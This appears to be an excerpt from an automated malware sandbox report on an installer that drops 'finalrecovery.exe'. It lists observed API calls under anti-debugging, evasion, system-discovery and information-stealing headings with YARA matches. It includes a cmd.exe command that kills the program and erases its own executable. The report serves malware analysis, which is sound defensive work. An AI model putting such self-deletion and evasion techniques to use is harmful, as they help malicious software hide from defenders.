Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_004634FC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,		1_2_004634FC
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: 1_2_00461AF4 FindFirstFileA,FindNextFileA,FindClose,		1_2_00461AF4
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,		2_2_00404490
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00423DAD FindFirstFileExW,		2_2_00423DAD
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_10007E39 FindFirstFileExW,		2_2_10007E39

Source: finalrecovery.exe, 00000002.00000002.322403889.0000000001782000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: finalrecovery.exe, 00000002.00000002.322403889.0000000001746000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0ex

Anti Debugging

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Code function: 2_2_004132EB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

2_2_004132EB

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Code function: 2_2_00402C00 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,

2_2_00402C00

Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp

Code function: 1_2_0044AC90 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_0044AC90

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Code function: 2_2_00402F20 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,

2_2_00402F20

Source: C:\Windows\SysWOW64\taskkill.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_0044028F mov eax, dword ptr fs:[00000030h]		2_2_0044028F
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_0042039F mov eax, dword ptr fs:[00000030h]		2_2_0042039F
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_004429E7 mov eax, dword ptr fs:[00000030h]		2_2_004429E7
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00417B2F mov eax, dword ptr fs:[00000030h]		2_2_00417B2F
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_10007A06 mov eax, dword ptr fs:[00000030h]		2_2_10007A06
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_10005EB5 mov eax, dword ptr fs:[00000030h]		2_2_10005EB5

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_0040F709 SetUnhandledExceptionFilter,		2_2_0040F709
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_004132EB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		2_2_004132EB
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_0040F575 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		2_2_0040F575
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_0040EB52 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		2_2_0040EB52
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_10005630 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		2_2_10005630
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_10002A85 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		2_2_10002A85
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_10002F80 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		2_2_10002F80

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp

Code function: 1_2_00476C24 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,

1_2_00476C24

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "finalrecovery.exe" /f

Jump to behavior

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "finalrecovery.exe" /f & erase "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe" & exit			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "finalrecovery.exe" /f			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp

Code function: 1_2_0042DF9C AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,

1_2_0042DF9C

Source: finalrecovery.exe, 00000002.00000002.322749910.000000000341F000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: finalrecovery.exe, 00000002.00000002.322749910.000000000341F000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: program manager
Source: finalrecovery.exe, 00000002.00000002.322749910.000000000341F000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: F.program manager#

Language, Device and Operating System Detection

Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoA,		0_2_004051D4
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoA,		0_2_00405220
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: GetLocaleInfoA,		1_2_00408548
Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp	Code function: GetLocaleInfoA,		1_2_00408594
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: GetKeyboardLayoutList,GetLocaleInfoA,__Init_thread_footer,		2_2_00404D40
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: EnumSystemLocalesW,		2_2_0042700C
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: EnumSystemLocalesW,		2_2_004270A7
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,		2_2_00427132
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: EnumSystemLocalesW,		2_2_0041E27F
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: GetLocaleInfoW,		2_2_00427385
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,		2_2_004274AB
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: GetLocaleInfoW,		2_2_004275B1
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,		2_2_00427680
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: GetLocaleInfoW,		2_2_0041E7A1
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,		2_2_00426D1F
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: EnumSystemLocalesW,		2_2_00426FC1

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Code function: 2_2_0040F773 cpuid

2_2_0040F773

Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp

Code function: 1_2_00457964 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,

1_2_00457964

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004026C4 GetSystemTime,

0_2_004026C4

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00405CBC GetVersionExA,

0_2_00405CBC

Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp

Code function: 1_2_004547B8 GetUserNameA,

1_2_004547B8

Stealing of Sensitive Information

Source: Yara match	File source: 2.2.finalrecovery.exe.19a0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.finalrecovery.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.finalrecovery.exe.19a0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.finalrecovery.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.322664682.00000000019A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.321983093.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY